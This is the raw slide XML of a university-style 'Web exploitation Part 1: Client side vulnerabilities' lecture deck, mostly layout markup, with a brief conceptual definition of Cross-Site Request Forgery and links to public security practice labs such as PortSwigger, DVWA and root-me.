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6" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="283" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="284" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="289" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="286" r:id="rId16"/>
    <p:sldId id="287"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E21"/>
    <a:srgbClr val="2427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56"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="73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81B1C-CF05-0F44-A33E-A38439A627E4}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>11/26/2024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715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1401786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715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264419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E715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63905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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125168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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92741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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286946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IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424651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5E9E-4F38-4008-FC07-B9D93041CD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07BFDA19-FAC9-0FD7-BAEA-D33742EE9E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E36167C-AD4B-E539-88F6-7CC7449180BB}"/>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6083455A-C314-6C47-2615-3003158DC3C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59BAA2-C063-397C-3FBF-C1F2C3AE4BCB}"/>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348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9C43-8061-EE6C-1B5A-F00114F6F9A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1F59A86-1141-99C9-BDB8-6CCD3B0C91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563DF8-C58E-CB5D-E4B4-ECF8DE2B9B41}"/>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44AD1815-680E-CA66-72F3-5B93608F28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FBC2A0-3E58-7E2B-B473-C5B1D56220C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7061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27F013-8549-0676-11FD-6F103704C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4142FA9-65FB-69A5-60E1-2B0B4379C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24627B-323E-27B2-00D4-6550681C5B48}"/>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D77A7913-33F9-8AE1-49E5-7235C65FFBB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CDD308B-3051-7C10-4285-1B01246E005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83038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5E29-8ABE-4749-6970-39FF5E0AF1BD}"/>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311F52-CF88-1929-6B8C-4C8F57736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624720-A70F-7736-DEB4-2089ABABB6AF}"/>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776CF58F-9B1A-57C2-DE71-C2A876C4485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7596248-356F-A677-D98E-1CEE83636BA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99754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AFDE-3277-B5AC-B7A7-8A6A9E237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B46AC05-F502-8D42-B690-688CE7C20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7C4EFB-7E34-35D7-5D07-35F2283FE57E}"/>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0722AEC8-F977-2F41-2CAD-46CA10EFEEA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0336CC9-EB60-2FC1-F1C3-325FC86CE90D}"/>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4820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CD5A-E230-A954-4CCC-434C6720741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B4F6749-9277-2566-1F0A-23A846700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C8068A8C-DBCB-50A1-D33B-6B282B123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15614D5-E93D-BE04-2D7F-1A508CBE399D}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BBFB3C2-4F64-3537-72BE-9F50DC7F40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0AC1213-C03E-D639-79A3-04DA685187A6}"/>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71202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AE8C-6FDA-BE19-DCE3-3BD308AA8CB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0C048F-7517-2662-B606-D2B218AF2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08264-C9DB-11A0-214F-2C5E2527F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A455F375-1D78-10E0-0B11-87037CD47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DC9A6-D883-0DD9-886C-A59CE4C5C8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E271A5E-75D4-8FDF-B300-292ABA1B5F65}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF8DFF9-5236-B29B-63FE-596F51177BF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B441FF7-20CE-491E-7EFE-27360F9A437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32220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FCA3-4188-F926-D0D7-CC334A94CBB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9A93095-8076-2A76-F8D7-E863175DB2CB}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A76A2F1-D15C-6B58-86B2-8F657B7BE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0FA665-696D-A3F4-4A11-988832C73ADE}"/>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43548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A5FBC-3932-EDC0-DE5A-1BCCC27B4E0B}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042D4C69-B32C-8C2A-5AA0-7001A97DC24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1637430-6E5A-07D5-EF51-CF10C16AA78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208652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7067-AD13-7B44-FF30-9D27D0AFF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B542325B-FCA7-0ABA-EE0B-4C6C7EECC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347363E-7471-6EF2-7E01-010E5419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CC1AE-A8BD-4A3F-79B1-B5C47CCB446F}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88CB3946-DEB7-F715-99AA-00291658D4B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577E1AE-91B9-6557-BBFE-A21DC6DF6894}"/>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69830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26C4-1335-F787-B666-BEF9285B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2A819E41-F91B-BE80-C8A2-3332C3E59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D2B77E7-5892-8985-4396-1324BDDF7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07B15-23BA-4BAD-CB04-3AC9F9FE8F69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>11/26/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72241F28-A60B-68F6-0A6C-DE4883148C2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00EB09E9-8C29-93A8-BA78-7D8182F604F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AD642C03-A410-6843-A0F7-BFD332B83092}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121104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92578-C2F0-CCB8-512F-F1CD25F51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DADB365-89B4-93E9-774E-A4700E5DE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C870984-0714-AFE8-8FB1-1C90EE7C9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9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>11/26/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17E7A94B-BE45-3BBC-FB43-57874ECC0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8557FB72-B5EA-BE12-58BF-13B4E5F9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42C03-A410-6843-A0F7-BFD332B83092}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71031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hyperlink" Target="https://xss.challenge.training.hacq.me/" TargetMode="External"/><Relationship Id="rId13"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hyperlink" Target="https://www.root-me.org/fr/Challenges/Web-Client/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intigriti.com/hackademy/xss-challeng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xss-game.appspot.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/digininja/DVWA" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/all-labs#cross-site-request-forgery-csrf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xss-quiz.int21h.jp/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/all-labs#cross-site-scripting" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xss.pwnfunction.com/" TargetMode="External"/><Relationship Id="rId1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app.hackthebox.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://overthewire.org/wargames/natas" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhacking.k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xss.pwnfuncti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webhook.site/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stocke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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-76554"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644C4AF9-6CBF-8504-F8FE-8E825ADADD7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8170096" y="2004365"/>
            <a:ext cx="1998805" cy="3028493"/>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072666" y="2004365"/>
            <a:ext cx="6261812" cy="2439129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1FD21"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:ea typeface="3270 CONDENSED" panose="02000509000000000000" pitchFamily="49" charset="0"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Web exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E1FD21"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:ea typeface="3270 CONDENSED" panose="02000509000000000000" pitchFamily="49" charset="0"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:ea typeface="3270 CONDENSED" panose="02000509000000000000" pitchFamily="49" charset="0"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Part 1</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:ea typeface="3270 CONDENSED" panose="02000509000000000000" pitchFamily="49" charset="0"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B720B3A-4214-C253-DC62-43F69EE562D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="819301" y="524291"/>
            <a:ext cx="10585095" cy="520900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D55F811-1B73-0EAE-5D9B-3DC714A2CA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072666" y="4296752"/>
            <a:ext cx="6261812" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Client side vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476D70DD-DDA5-8E1C-DC90-BA7243AD243D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1851500" y="5190890"/>
            <a:ext cx="63900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9394D29-BC34-199F-B7B9-48169D245347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072666" y="5371443"/>
            <a:ext cx="6261812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Winter 24/25</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL"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5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-52426" y="6698054"/>
            <a:ext cx="12296852" cy="166519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="979666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0" y="0"/>
            <a:ext cx="3721001" cy="6858000"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4652389" y="1227270"/>
            <a:ext cx="6447129" cy="3079048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>As the name suggests, CSRF is about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Forging (Faking) requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>It happens when the web application does not properly verify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>legitimacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> of a request that it receives.</a:t>
            </a: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CSRF attacks are usually a fancy name for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>session hijacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>– where attackers use the victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> on a website in order to perform unwanted actions on the victim’s behalf.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370558" y="524524"/>
            <a:ext cx="2989117" cy="243717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633984" y="1254616"/>
            <a:ext cx="2830735" cy="2298065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4280"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cross site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
